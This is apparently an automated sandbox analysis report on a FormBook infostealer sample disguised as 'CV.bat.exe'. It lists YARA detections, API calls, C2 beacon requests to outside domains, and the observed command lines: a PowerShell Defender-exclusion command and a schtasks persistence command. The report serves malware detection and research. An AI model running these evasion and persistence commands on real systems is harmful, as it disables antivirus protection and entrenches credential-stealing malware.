62 4a 74 48 75 72 66 67 65 79 78 78 72 4b 4c 33 2d 41 76 6a 63 4f 78 51 34 67 73 70 6c 58 69 5a 6f 58 4f 45 53 6b 53 5a 71 57 65 44 76 41 61 38 51 6e 61 44 6b 49 77 42 48 55 7a 79 68 76 7a 42 49 37 65 56 6f 33 4b 69 48 64 6b 41 4e 52 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: WvMH=hQCvjyR4iH7W7PL7UgzErg2ATW3LlngqhsbmVcTAdc1MVw1VAPd_elaCoPAjtOfVS-B2p9TotAAgUemfCHzau-oWnBsTi93bRG0Gi2EtejcQiUn3~RdLr9gS0DtzWz2iNKzeI5TwqgvL(f~oTpU1mPjz4oV3w4bO367Gfxt-UchBisb6YehlrrG0VsaW3Aj4nYRs4QvZmTR1CNoOl5o1(lPa52A1Weu_kYZiqo9fUkM0JOAwyMBAr4a-evbEQlEHP3BwpCq-1DPS2soUFCUQWfhXTeyNEVSQ8v(Hh0ERqA03dUuJcxOwBJ8aIhe6(78lef7bJtHurfgeyxxrKL3-AvjcOxQ4gsplXiZoXOESkSZqWeDvAa8QnaDkIwBHUzyhvzBI7eVo3KiHdkANRg).
Source: unknown DNS traffic detected: queries for: www.miarizzuto.org
Source: global traffic HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=ClEE/ZchhSWI9Fw4wt/3uVHiPVKnhBdsoB1lL7XTwBZGLskW0dT3J+GyfBiSRlOqjq3/13+wQlUMF9TRa7Zw+CqEhvu+ka1r7A== HTTP/1.1Host: www.miarizzuto.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /redb/?SrNH_=ZbLl4nlXWVx&WvMH=sSqPgCldjkbi0+fTeRrTo1yeRkXijBFS3eCOWeLwWqlRfT02SfRof0res+4jmsjJUPdu+dXwzSVFQdySZWLfkZF8oXotr+qwUQ== HTTP/1.1Host: www.yaignars.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: CV.bat.exe PID: 5060, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: chkdsk.exe PID: 1264, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: CV.bat.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.528027356.0000000005380000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.418181649.0000000000DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.380716158.00000000109CA000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.527385470.0000000005350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.417314875.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: CV.bat.exe PID: 5060, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 1264, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 0_2_00EBE9E3 0_2_00EBE9E3
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 0_2_00EBE9F0 0_2_00EBE9F0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 0_2_00EBCA4C 0_2_00EBCA4C
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 0_2_04E4AED8 0_2_04E4AED8
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01240D20 8_2_01240D20
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01264120 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0124F900 8_2_0124F900
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01312D07 8_2_01312D07
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01311D55 8_2_01311D55
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01272581 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125D5E0 8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013125DD 8_2_013125DD
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01301002 8_2_01301002
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125841F 8_2_0125841F
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130D466 8_2_0130D466
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012720A0 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013120A8 8_2_013120A8
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0125B090 8_2_0125B090
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013128EC 8_2_013128EC
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01312B28 8_2_01312B28
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0127EBB0 8_2_0127EBB0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01311FF1 8_2_01311FF1
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0130DBD2 8_2_0130DBD2
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01266E30 8_2_01266E30
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_013122AE 8_2_013122AE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01312EF7 8_2_01312EF7
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004012A3 8_2_004012A3
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004219A0 8_2_004219A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_00421A9A 8_2_00421A9A
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004012B4 8_2_004012B4
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0042134D 8_2_0042134D
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004044C7 8_2_004044C7
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004044BE 8_2_004044BE
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0040B513 8_2_0040B513
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0040B517 8_2_0040B517
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_00422672 8_2_00422672
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004046E7 8_2_004046E7
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0040FF57 8_2_0040FF57
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\CV.bat.exe Code function: String function: 0124B150 appears 35 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_01289910
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289540 NtReadFile,LdrInitializeThunk, 8_2_01289540
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012899A0 NtCreateSection,LdrInitializeThunk, 8_2_012899A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012895D0 NtClose,LdrInitializeThunk, 8_2_012895D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289860 NtQuerySystemInformation,LdrInitializeThunk, 8_2_01289860
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289840 NtDelayExecution,LdrInitializeThunk, 8_2_01289840
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk, 8_2_012898F0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289710 NtQueryInformationToken,LdrInitializeThunk, 8_2_01289710
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk, 8_2_012897A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289780 NtMapViewOfSection,LdrInitializeThunk, 8_2_01289780
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289FE0 NtCreateMutant,LdrInitializeThunk, 8_2_01289FE0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289A20 NtResumeThread,LdrInitializeThunk, 8_2_01289A20
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk, 8_2_01289A00
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk, 8_2_01289660
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289A50 NtCreateFile,LdrInitializeThunk, 8_2_01289A50
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_012896E0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289520 NtWaitForSingleObject, 8_2_01289520
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128AD30 NtSetContextThread, 8_2_0128AD30
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289560 NtWriteFile, 8_2_01289560
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289950 NtQueueApcThread, 8_2_01289950
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012895F0 NtQueryInformationFile, 8_2_012895F0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012899D0 NtCreateProcessEx, 8_2_012899D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289820 NtEnumerateKey, 8_2_01289820
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128B040 NtSuspendThread, 8_2_0128B040
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012898A0 NtWriteVirtualMemory, 8_2_012898A0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289730 NtQueryVirtualMemory, 8_2_01289730
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289B00 NtSetValueKey, 8_2_01289B00
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128A710 NtOpenProcessToken, 8_2_0128A710
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289760 NtOpenProcess, 8_2_01289760
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289770 NtSetInformationFile, 8_2_01289770
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128A770 NtOpenThread, 8_2_0128A770
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0128A3B0 NtGetContextThread, 8_2_0128A3B0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289610 NtEnumerateValueKey, 8_2_01289610
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289A10 NtQuerySection, 8_2_01289A10
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289670 NtQueryInformationProcess, 8_2_01289670
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289650 NtQueryValueKey, 8_2_01289650
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_01289A80 NtOpenDirectoryObject, 8_2_01289A80
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_012896D0 NtCreateKey, 8_2_012896D0
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0041E057 NtClose, 8_2_0041E057
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0041E107 NtAllocateVirtualMemory, 8_2_0041E107
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004012A3 NtProtectVirtualMemory, 8_2_004012A3
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0041DF27 NtCreateFile, 8_2_0041DF27
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0041DFD7 NtReadFile, 8_2_0041DFD7
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_0041E183 NtAllocateVirtualMemory, 8_2_0041E183
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004012B4 NtProtectVirtualMemory, 8_2_004012B4
Source: C:\Users\user\Desktop\CV.bat.exe Code function: 8_2_004014E9 NtProtectVirtualMemory, 8_2_004014E9
Sample file is different than original file name gathered from version info
Source: CV.bat.exe, 00000000.00000002.314709188.0000000006FA0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000000.255904750.0000000000432000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.306226428.0000000003890000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.305574827.00000000037D1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.314741085.0000000007170000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.303017091.000000000119F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.299197168.0000000001006000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe
Source: CV.bat.exe ReversingLabs: Detection: 33%
Source: CV.bat.exe Virustotal: Detection: 34%
Source: C:\Users\user\Desktop\CV.bat.exe File read: C:\Users\user\Desktop\CV.bat.exe Jump to behavior
Source: CV.bat.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\CV.bat.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe Jump to behavior
Source: C:\Users\user\Desktop\CV.bat.exe File created: C:\Users\user\AppData\Local\Temp\tmpE00F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/8@6/2
Source: C:\Users\user\Desktop\CV.bat.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: CV.bat.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\CV.bat.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\CV.bat.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: CV.bat.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
